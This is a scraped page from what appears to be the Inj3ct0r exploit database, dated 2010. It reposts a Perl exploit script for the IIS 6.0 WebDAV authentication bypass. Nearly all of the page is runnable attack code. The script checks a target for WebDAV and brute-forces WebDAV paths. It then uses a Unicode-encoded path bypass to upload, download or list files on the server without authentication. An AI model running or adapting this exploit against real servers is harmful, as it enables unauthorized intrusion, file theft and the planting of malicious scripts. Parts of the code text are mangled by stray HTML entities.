[remote exploits] - MS IIS 6.0 WebDAV Auth. Bypass Exploit
Posted on 24 September 2010
<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>MS IIS 6.0 WebDAV Auth. Bypass Exploit | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='Date: 24 Sep 2010 | Exploit category: remote exploits | Exploit author: FoX HaCkEr | Inj3ct0r exploit database' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></head><body><pre>====================================== MS IIS 6.0 WebDAV Auth. Bypass Exploit ====================================== # Author : FoX HaCkEr #Contact : MKQ@HoTmAiL.CoM # SiTe : www.sec4ever.com ====================================================================================================== #!/usr/bin/perl # ********* !!! WARNING !!! ********* # * FOR SECURITY TESTiNG ONLY! * # *********************************** # MS IIS 6.0 WebDAV Auth. Bypass Exploit v1.1 # v1.1 add brute force dir fuction. # v1.0 download?upload and list dir. # # Usage: # IIS6_webdav.pl -target -port -method -webdavpath|-BruteForcePath [-file] # -target &nbs p; eg.: 192.168.1.1 # -port eg.: 80 # -method eg.: g # (p:PUT,g:GET,l:LIST) # -webdavpath eg.: webdav # -BruteForcePath eg.: brute force webdav path # -file (optional) eg.: test.aspx # Example: # put a file: # IIS6_webdav.pl -t 192.168.1.1 -p 80 -m p -x webdav -f test.aspx # get a file: # IIS6_webdav.pl -t 192.168.1.1 -p 80 -m g -x webdav -f test.aspx # list dir: # IIS6_webdav.pl -t 192.168.1.1 -p 80 -m l -x webdav # brute force + list dir: # IIS6_webdav.pl -t 192.168.1.1 -p 80 -m l -b dirdic.txt # brute force + get file: # IIS6_webdav.pl -t 192.168.1.1 -p 80 -m g -b dirdic.txt -f test.aspx use IO::Socket;use Getopt::Long; use threads; use threads::shared; # Globals Go Here. my $target; # Host being probed. my $port; # Webserver port. my $method; # HTTP Method, PUT GET or . my $xpath; # WebDAV path on Webserver. my $bpath; # Bruteforce WebDAV path. my $file; # file name. my $httpmethod; my $Host_Header; # The Host header has to be changed GetOptions( "target=s" ; => $target, "port=i" => $port, "method=s" => $method, "xpath=s" => $xpath, "bpath=s" => $bpath, "file=s" => $file, "help|?" => sub { hello(); exit(0); } ); $error .= "Error: You must specify a target host " if ((!$target)); $error .= "Error: You must specify a target port " if ((!$port)); $error .= "Error: You must specify a put,get or list method " if ((!$method)); $error .= "Error: You must specify a webdav path " if ((!$xpath) && (!$bpath)); $error .= "Error: You must specify a upload or download file name " if ((!$file) && $method != "l"); if ($error) { print "Try $0 -help or -?' for more information. $error " ; exit; } hello(); if ($method eq "p") { $httpmethod = "PUT"; } elsif ($method eq "g") { $httpmethod = "GET"; } elsif ($method eq "l") { $httpmethod = "PROPFIND"; } else { print "$method Method not accept !!! "; exit(0); } # ************************************ # * We testing WebDAV methods first * # ************************************ webdavtest($target,$port); #end of WebDAV testing. # **************************************** # * We try to brute forceing WebDAV path * # **************************************** if ($bpath) { $xpath = webdavbf($target,$port,$bpath); } #end of brute force print "-" x 60 ." "; if ($httpmethod eq "PUT") { my $content; my $data; #cacl file size $filesize = -s $file; print "$file size is $filesize bytes "; open(INFO, $file) || die("Could not open file!"); #@lines=<INFO>; binmode(INFO); #binary while( read(INFO, $data, $filesize)) { $content .= $data; } close(INFO); #print $content; $Host_Header = "Translate: f Host: $target Content-Length: $filesize "; } elsif ($httpmethod eq "GET") { $Host_Header = "Translate: f Host: $target Connection: close "; } elsif ($httpmethod eq "PROPFIND") { $Host_Header = "Host: $target Connection: close Content-Type: text/xml; charset="utf-8" Content-Length: 0 "; $Host_Header = $Host_Header."<?xml version="1.0" encoding="utf-8"?><D:propfind xmlns:D="DAV:"><D:prop xmlns:R="http://apache.org/dav/props/"><R:bigbox/><R:author/><R:DingALing/><R:Random/></D:prop></D:propfind>"; } print "-" x 60 ." $httpmethod $file , Please wait ... "."-" x 60 ." "; # ******************** **** # * Sending HTTP request * # ************************ if ($httpmethod eq "PUT") { @results=sendraw2("$httpmethod /%c0%af$xpath/$file HTTP/1.0 $Host_Header $content",$target,$port,10); if ($#results < 1){die "10s timeout to $target on port $port ";} } elsif ($httpmethod eq "GET") { @results=sendraw2("$httpmethod /%c0%af$xpath/$file HTTP/1.0 $Host_Header",$target,$port,10); if ($#results < 1){die "10s timeout to $target on port $port ";} } elsif ($httpmethod eq "PROPFIND") { @results=sendraw2("$httpmethod /%c0%af$xpath/ HTTP/1.0 $Host_Header",$target,$port,10); if ($#results < 1){die "10s timeout to $target on port $port ";} } #print @results; $flag="off"; if ($results[0] =~ m|^HTTP/1.[01] 2[0-9][0-9] |){ $flag="on"; } elsif ($results[0] =~ m|^HTTP/1.[01] 4[0-9][0-9] |){ $flag="off"; }&nb sp; print "-" x 60 ." "; if ($flag eq "on") { if ($httpmethod eq "PUT") { print "$httpmethod $file from [$target:$port/$xpath] OK "; } elsif ($httpmethod eq "GET") { my $line_no = 0; my $counter = @results; foreach $line (@results){ ++$line_no; if ($line =~ /^Accept-Ranges: bytes /){ last; } } # Write file to disk open(OUTFILE, ">$file") or die "Could not write to file: $! "; binmode (OUTFILE); print OUTFILE @results[$line_no+1..$counter]; close(OUTFILE); print "$httpmethod $file from [$target:$port/$xpath] OK Please check $file on local disk "; } elsif ($httpmethod eq "PROPFIND") { print "$httpmethod path list from [$target:$port/$xpath] OK "; foreach $line (@results){ if ($line =~ /^<?xml version=/i){ my @list = split("<a:href>", $line); foreach $path (@list) { $no = index($path,"<"); $result.=substr($path, 0, $no)." "; } print $result; ; last; } } } } else { print "$httpmethod $file from [$target:$port/$xpath] FAILED!!! "; } print "-" x 60 ." "; exit(0); # ************* # * Sendraw-2 * # ************* sub sendraw2 { my ($pstr,$realip,$realport,$timeout)=@_; my $target2 = inet_aton($realip); my $flagexit=0; $SIG{ALRM}=&ermm; socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || die("Socket problems"); alarm($timeout); if (connect(S,pack "SnA4x8",2,$realport,$target2)){ alarm(0); my @in; select(S); $|=1; print $pstr; alarm($timeout); while(<S>){ if ($flagexit == 1){ close (S); print STDOUT "Timeout "; return "Timeout"; } push @in, $_; } alarm(0); select(STDOUT); close(S); return @in; } else {return "0";} } sub ermm{ $flagexit=1; close (S); } sub webdavtest { my ($testip,$testport)=@_; print "-" x 60 ." "; print "Testing WebDAV methods [$testip $testport] "; print "-" x 60 ." "; @results=sendraw2("OPTIONS / HTTP/1.0 ",$testip,$testport,10); if ($#results < 1){die "10s timeout to $target on port $testport ";} #print @results; $flag="off"; foreach $line (@results){ if ($line =~ /^Server: /){ ($left,$right)=split(/:/,$line); $right =~ s/ //g; print "$target : Server type is : $right"; if ($right !~ /Microsoft-IIS/i){ print "$target : Not a Microsoft IIS Server "; exit(0); } } if ($line =~ /^DAV: /){ $flag="on"; } if ($line =~ /^Public: / && $flag eq "on"){ ($left,$right)=split(/:/,$line); &n bsp; $right =~ s/ //g; print "$target : Method type is : $right"; if ($right !~ /$httpmethod/i){ print "$target : Not allow $httpmethod on this WebDAV Server "; exit(0); } else { $flag="on"; } } } if ($flag eq "off") { print "$target : WebDAV disable "; exit(0); } } sub webdavbf { my ($bfip,$bfport,$bfpath)=@_; print "-" x 60 ." "; print "Try to brute forceing WebDAV path ... "; print "-" x 60 ." "; & nbsp; open(BF, $bfpath) || die("Could not open file!"); foreach $lines (<BF>){ chomp($lines); $Host_Header = "Host: $bfip Connection: close Content-Type: text/xml; charset="utf-8" Content-Length: 0 "; $Host_Header = $Host_Header."<?xml version="1.0" encoding="utf-8"?><D:propfind xmlns:D="DAV:"><D:prop xmlns:R="http://apache.org/dav/props/"><R:bigbox/><R:author/><R:DingALing/><R:Random/></D:prop></D:propfind>"; @results=sendraw2("PROPFIND /$lines/ HTTP/1.0 $Host_Header",$bfip,$bfport,10); if ($#results < 1){die "10s timeout to $bfip on port $bfport ";} print "[$lines]...$results[0]"; #maybe this response< br> #HTTP/1.1 207 Multi-Status if ($results[0] =~ m|^HTTP/1.[01] 401 |){ print "Find out path on [$lines] "; return $lines; last; } } close(BF) ; print "Sorry... We can not find any more path... :( "; exit(0); } sub hello{ print " "; print " ################################################## "; print " # MS IIS 6.0 WebDAV Auth. Bypass Exploit V1.0 # "; print " # **************** !!! WARNING !!! **************# "; print " # **** FOR PRIV8 AND EDUCATIONAL USE ONLY! ****# "; print " # ***********************************************# "; print " # Written by csgcsg 090529 ; # "; print " ################################################### "; print " $0 -target -port -method -webdavpath [-file] "; print " -target eg.: 192.168.1.1 "; print " -port eg.: 80 "; print " -method (p:PUT, g:GET, l:LIST) eg.: g "; print " -webdavpath|-bruteForcePath eg.: webdav "; print " -file eg.: test.aspx "; print " Usage eg.: $0 -t 192.168.1.1 -p 80 -m p -x webdav -f test.aspx "; }; ======================================================================================================= Gr33ts: Mr.MoDaMeR & SILVER FoX & Z7FAN HaCkEr & Black Cobra & KinG oF CnTroL & MadjiX & Ma3sTr0-Dz Lagripe-Dz & Shi6oN HaCkEr & ALL Members sec4ever & ALL MY Friend in MsN & ALL Members p0c team & # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-09-24]</pre></body></html>
